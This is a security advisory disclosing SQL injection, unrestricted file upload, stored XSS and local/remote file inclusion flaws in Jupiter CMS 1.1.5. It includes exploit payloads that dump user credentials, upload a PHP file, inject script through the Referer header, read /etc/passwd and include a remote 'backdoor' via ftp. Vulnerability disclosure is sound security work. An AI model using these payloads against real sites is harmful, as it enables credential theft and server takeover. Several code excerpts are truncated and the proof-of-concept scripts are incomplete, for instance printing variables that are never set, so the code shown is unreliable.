Title:    Jupiter CMS 1.1.5 Multiple Vulnerabilities
 Advisory ID:    12070214
  Risk level:    High
      Author:    DarkFig <gmdarkfig@gmail.com>
         URL:    http://www.acid-root.new.fr/advisories/12070214.txt


  Jupiter CMS 1.1.5 is a powerful user-friendly Community Management System.
Advanced boxes/block system, members management, high-end forums, topics,
statistics, emoticons/logs management. A new version is actually in coding,
however the latest stable version is 1.1.5. 

  I decided to download it because a friend tell me that he was going to use
it for his website and he asked me if I could audit it. The first thing I
realised is that they directly used the $_SERVER array (without protection
against SQL Injection attacks) in several SQL request. The second vulnerability
i found, is that the script do not check for file extensions when a user upload
an emoticon, and the access protection of the "modules" directory files can be
bypassed. There is also a remote/local file inclusion with the "n" parameter,
and a permanent XSS.

.: [ VULN #1 ]

Risk level: Medium
   Summary: find_ip() SQL Injection
Conditions: None

  The script "includes/functions.php" contains the following functions:

function find_ip() {
   if (getenv('HTTP_CLIENT_IP')) $ip = getenv('HTTP_CLIENT_IP');
   elseif (getenv('HTTP_X_FORWARDED_FOR')) $ip = getenv('HTTP_X_FORWARDED_FOR');
   elseif (getenv('HTTP_X_FORWARDED')) $ip = getenv('HTTP_X_FORWARDED');
   elseif (getenv('HTTP_FORWARDED_FOR')) $ip = getenv('HTTP_FORWARDED_FOR');
   elseif (getenv('HTTP_FORWARDED')) $ip = getenv('HTTP_FORWARDED');
   else $ip = $_SERVER['REMOTE_ADDR'];
return $ip;

  This function is called from others PHP scripts in order to determine the IP
of the client. But the majority of headers can be modified by the user. For the
most part of the time, this function is used in SQL requests. For example, the
script "index.php" contains the following SQL request:

$ban_ip_check = $db->getLine("SELECT ip, date FROM bans WHERE ip = '".find_ip()."'");
if($ban_ip_check != FALSE) {
  <link href="templates/<?= $template ?>/extra/jupiter.css" rel="stylesheet" type="tex
  <div id="attentionwrapper">
  <table class="main" height="1%" cellspacing="1" cellpadding="4"><col width="1%"><col
  <tr height="1%" class="head"><td class="head" colspan="2"><?= $language['Bans name']
  <tr height="1%"><td class="con1" rowspan="5" valign="top"><img src="templates/<?= $t
  <tr height="1%" class="bottom"><td valign="top"><?= $language['Bans title'] ?></td><
  <tr height="1%"><td class="con1"><?= $language['Bans desc'] ?> <?= $ban_ip_check['ip
  <tr height="1%" class="bottom"><td valign="top"><?= $language['Bans title2'] ?></td>
<? exit;

  magic_quotes_gpc is not applied to $_SERVER array, so this can lead to SQL
Injection attack even if magic_quotes_gpc = On. One result of the SQL request
is returned to the user, so this is a simple SQL Injection (not a blind). This
simple poc illustrate how an attacker can exploit this vulnerability:

# SQL Injection Vulnerability (POC #1)
require("phpsploitclass.php");  # See [1]
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';

$xpl = new phpsploit();
$hev =  "-1' UNION SELECT CONCAT('"
       ."(SELECT username FROM users LIMIT 0,1),'"
       ."(SELECT password FROM users LIMIT 0,1),'"
       ."[END_XPL_PWD]'),1 #";

print $usr[1].'::'.$pwd[1];
# EOF POC #1

.: [ VULN #2 ]

Risk level: High
   Summary: File Upload Vulnerability
Conditions: register_globals = On

  All scripts situated in the "modules" directory can be executed by a guest,
for example let's see "modules/emoticons.php" access protection :

if(isset($is_guest) || isset($is_user))
{ header("location: $PHP_SELF?i=2"); exit; }

  An attacker can access to this script, simply by sending a request
which not contains the "is_guest" and "is_user" variables. For the most part of
the time, this is not critical because the script use several functions
stored in other files (not include), this return a Fatal Error. But if the
"a" parameter is set to 1 the script "modules/emoticons.php" let us upload
a file, before producing a Fatal Error. Let's see the upload protection:

$allowed_types = array('image/gif', 'image/jpeg', 'image/pjpeg', 'image/png', 'image/x-png');
header("location: $PHP_SELF?n=modules/emoticons&i=30");exit;

  So what we have to do to bypass this protection, is just to modify the
"Content-Type" header. This poc illustrate how an attacker can upload a
malicious php file:

# File Upload Vulnerability (POC #2)
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';

$xpl = new phpsploit();
$arr = array(frmdt_url  => $url.'modules/emoticons.php',
             "a"        => 1,
             "req_file" => array(frmdt_filename => "iamaphpfile.php",
                                 frmdt_type     => "image/jpeg",
                                 frmdt_content  => "<?php echo(iamontheserver); ?>"));
# EOF POC #2

.: [ VULN #3 ]

Risk level: Low
   Summary: "Logged Guests" XSS
Conditions: None

  The script "index.php" insert (in the database) some informations sent by
the web browser.

  $db->insertRow("online",array('sid' => ''.$session_id.'',
    'type' => 'live','status' => 'guest','user' => NULL,'user_id' => NULL,
    'user_authorization' => NULL,'user_email' => NULL,'user_hideemail' => NULL,
    'user_flag' => NULL,'user_location' => NULL,'ip' => ''.find_ip().'',
    'refer' => ''.$_SERVER['HTTP_REFERER'].'','browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'',
    'lang' => ''.$lang.'','date' => ''.time().''));

  $db->insertRow("online",array('sid' => ''.$session_id.'','type' => 'log',
    'status' => 'guest','user' => NULL,'user_id' => NULL,'user_authorization' => NULL,
    'user_email' => NULL,'user_hideemail' => NULL,'user_flag' => NULL,'user_location' => NULL,
    'ip' => ''.find_ip().'','refer' => ''.$_SERVER['HTTP_REFERER'].'',
    'browser' => ''.find_browser($_SERVER['HTTP_USER_AGENT']).'','lang' => ''.$lang.'',
    'date' => ''.time().''));

  $_SESSION['in_site'] = 1;

  All data inserted in the database are protected against SQL Injection attacks,
however they're not protected against XSS. This is a permanent XSS, the malicious
code will be executed when the admin will click on "Logged Guest". Proof of concept:

# "Logged Guest" XSS Vulnerability (POC #3)
error_reporting(E_ALL ^ E_NOTICE);
$url = 'http://localhost/jupiter/';

$xpl = new phpsploit();
$xpl->addheader("Referer", "<script>alert('XSS VULN')</script>");
# EOF POC #3

.: [ VULN #4 ]

Risk level: High
   Summary: Local/Remote File Inclusion
Conditions: LFI: magic_quotes_gpc = Off 
            RFI: PHP >= 5.0.0, allow_url_fopen = On

  The script "index.php" contains the following code:

     if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
     else include("$n.php");
   elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");

  The "n" parameter isn't properly filtered, this can lead to file inclusion.
Local file inclusion will work if magic_quotes_gpc=Off, the null byte char \x00
is required. Remote file inclusion will work if the server is running on PHP >= 5.
In this version, the file_exists() function can be used with some URL wrappers,
you can use ftp:// for example. Simple poc:

LFI: http://<host><path>/index.php?n=/etc/passwd%00
RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor

.: [ LINKS ]

[1] PhpSploit Class

[2] FTP/FTPS with PHP

[3] Good paper about File Upload Vulnerability

[4] X-Forwarded-For

[5] AcidRoot